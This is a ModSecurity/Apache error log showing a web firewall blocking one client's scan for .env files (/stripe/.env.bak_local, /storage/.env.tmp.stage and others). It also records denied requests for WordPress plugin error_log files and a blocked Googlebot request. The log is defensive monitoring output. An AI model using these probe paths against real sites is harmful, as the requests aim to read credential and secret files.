[Mon May 11 11:36:02.129780 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:31424] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.tmp.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/storage/.env.tmp.stage"] [unique_id "agGjAkYQeUtAPynIs6xTbQAAAAo"]
[Mon May 11 11:36:02.129989 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:31424] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/storage/.env.tmp.stage"] [unique_id "agGjAkYQeUtAPynIs6xTbQAAAAo"]
[Mon May 11 11:36:03.239176 2026] [authz_core:error] [pid 1254242:tid 1254261] [client 88.88.156.124:57692] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/actions/error_log
[Mon May 11 11:36:03.339068 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:31424] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjAkYQeUtAPynIs6xTbQAAAAo"]
[Mon May 11 11:36:03.365893 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:47636] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.tmp.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/storage/.env.tmp.stage"] [unique_id "agGjA5kIEwRJMyDaV55JtAAAAUg"]
[Mon May 11 11:36:03.366315 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:47636] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/storage/.env.tmp.stage"] [unique_id "agGjA5kIEwRJMyDaV55JtAAAAUg"]
[Mon May 11 11:36:04.625378 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:47636] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjA5kIEwRJMyDaV55JtAAAAUg"]
[Mon May 11 11:36:04.757799 2026] [authz_core:error] [pid 1254242:tid 1254261] [client 88.88.156.124:57692] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/actions/error_log
[Mon May 11 11:36:06.280487 2026] [authz_core:error] [pid 1254242:tid 1254261] [client 88.88.156.124:57692] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/actions/error_log
[Mon May 11 11:36:07.791885 2026] [authz_core:error] [pid 1254242:tid 1254261] [client 88.88.156.124:57692] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/actions/error_log
[Mon May 11 11:36:11.153608 2026] [security2:error] [pid 1256241:tid 1256265] [client 66.249.75.65:36543] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/mlpsex.com"] [unique_id "agGjC5kIEwRJMyDaV55JuQAAAVM"]
[Mon May 11 11:36:11.154035 2026] [security2:error] [pid 1256241:tid 1256265] [client 66.249.75.65:36543] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/mlpsex.com"] [unique_id "agGjC5kIEwRJMyDaV55JuQAAAVM"]
[Mon May 11 11:36:11.156259 2026] [security2:error] [pid 1256241:tid 1256265] [client 66.249.75.65:36543] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/mlpsex.com"] [unique_id "agGjC5kIEwRJMyDaV55JuQAAAVM"]
[Mon May 11 11:36:12.297571 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:47716] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stripe/.env.bak_local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/stripe/.env.bak_local"] [unique_id "agGjDL4KNmD_mZ_vlf8zqgAAAEs"]
[Mon May 11 11:36:12.297785 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:47716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/stripe/.env.bak_local"] [unique_id "agGjDL4KNmD_mZ_vlf8zqgAAAEs"]
[Mon May 11 11:36:13.461858 2026] [security2:error] [pid 1254242:tid 1254256] [client 185.177.72.9:47716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjDL4KNmD_mZ_vlf8zqgAAAEs"]
[Mon May 11 11:36:13.487649 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:33582] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stripe/.env.bak_local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/stripe/.env.bak_local"] [unique_id "agGjDWS6k_SCYd1AVZqp0gAAAQs"]
[Mon May 11 11:36:13.487880 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:33582] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/stripe/.env.bak_local"] [unique_id "agGjDWS6k_SCYd1AVZqp0gAAAQs"]
[Mon May 11 11:36:14.770473 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:33582] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjDWS6k_SCYd1AVZqp0gAAAQs"]
[Mon May 11 11:36:14.797614 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:33598] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stripe/.env.copy.min"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/stripe/.env.copy.min"] [unique_id "agGjDhjZymfuKpjWXeh4AwAAANE"]
[Mon May 11 11:36:14.797824 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:33598] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/stripe/.env.copy.min"] [unique_id "agGjDhjZymfuKpjWXeh4AwAAANE"]
[Mon May 11 11:36:16.026139 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:33598] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjDhjZymfuKpjWXeh4AwAAANE"]
[Mon May 11 11:36:16.051247 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:33608] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stripe/.env.copy.min"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/stripe/.env.copy.min"] [unique_id "agGjEGS6k_SCYd1AVZqp1AAAARE"]
[Mon May 11 11:36:16.051578 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:33608] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/stripe/.env.copy.min"] [unique_id "agGjEGS6k_SCYd1AVZqp1AAAARE"]
[Mon May 11 11:36:16.628549 2026] [authz_core:error] [pid 1254212:tid 1254227] [client 88.88.156.124:57412] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/migration/error_log
[Mon May 11 11:36:17.727379 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:33608] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjEGS6k_SCYd1AVZqp1AAAARE"]
[Mon May 11 11:36:17.753034 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:33610] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stripe/.env.development_development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/stripe/.env.development_development"] [unique_id "agGjEUYQeUtAPynIs6xTfgAAAA4"]
[Mon May 11 11:36:17.753560 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:33610] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/stripe/.env.development_development"] [unique_id "agGjEUYQeUtAPynIs6xTfgAAAA4"]
[Mon May 11 11:36:18.143571 2026] [authz_core:error] [pid 1254212:tid 1254227] [client 88.88.156.124:57412] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/migration/error_log
[Mon May 11 11:36:18.965182 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:33610] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjEUYQeUtAPynIs6xTfgAAAA4"]
[Mon May 11 11:36:18.991639 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:33620] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stripe/.env.development_development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/stripe/.env.development_development"] [unique_id "agGjEpkIEwRJMyDaV55JyAAAAUc"]
[Mon May 11 11:36:18.991986 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:33620] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/stripe/.env.development_development"] [unique_id "agGjEpkIEwRJMyDaV55JyAAAAUc"]
[Mon May 11 11:36:19.725047 2026] [authz_core:error] [pid 1254212:tid 1254227] [client 88.88.156.124:57412] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/migration/error_log
[Mon May 11 11:36:20.643354 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:33620] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjEpkIEwRJMyDaV55JyAAAAUc"]
[Mon May 11 11:36:20.667879 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:33626] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stripe/.env.docker.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/stripe/.env.docker.example"] [unique_id "agGjFEYQeUtAPynIs6xThAAAAAw"]
[Mon May 11 11:36:20.668044 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:33626] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/stripe/.env.docker.example"] [unique_id "agGjFEYQeUtAPynIs6xThAAAAAw"]
[Mon May 11 11:36:21.189217 2026] [authz_core:error] [pid 1254212:tid 1254227] [client 88.88.156.124:57412] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/migration/error_log
[Mon May 11 11:36:21.861923 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:33626] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjFEYQeUtAPynIs6xThAAAAAw"]
[Mon May 11 11:36:21.889782 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:33634] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stripe/.env.docker.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/stripe/.env.docker.example"] [unique_id "agGjFWS6k_SCYd1AVZqp4gAAAQM"]
[Mon May 11 11:36:21.890302 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:33634] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/stripe/.env.docker.example"] [unique_id "agGjFWS6k_SCYd1AVZqp4gAAAQM"]
[Mon May 11 11:36:22.704681 2026] [authz_core:error] [pid 1254212:tid 1254227] [client 88.88.156.124:57412] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/migration/error_log
[Mon May 11 11:36:23.103925 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:33634] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGjFWS6k_SCYd1AVZqp4gAAAQM"]
[Mon May 11 11:36:28.777979 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:46266] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env.dist.release"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/svelte/.env.dist.release"] [unique_id "agGjHERdw2n9wv6Ai48DKAAAAIw"]
[Mon May 11 11:36:28.778508 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:46266] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/svelte/.env.dist.release"] [unique_id "agGjHERdw2n9wv6Ai48DKAAAAIw"]
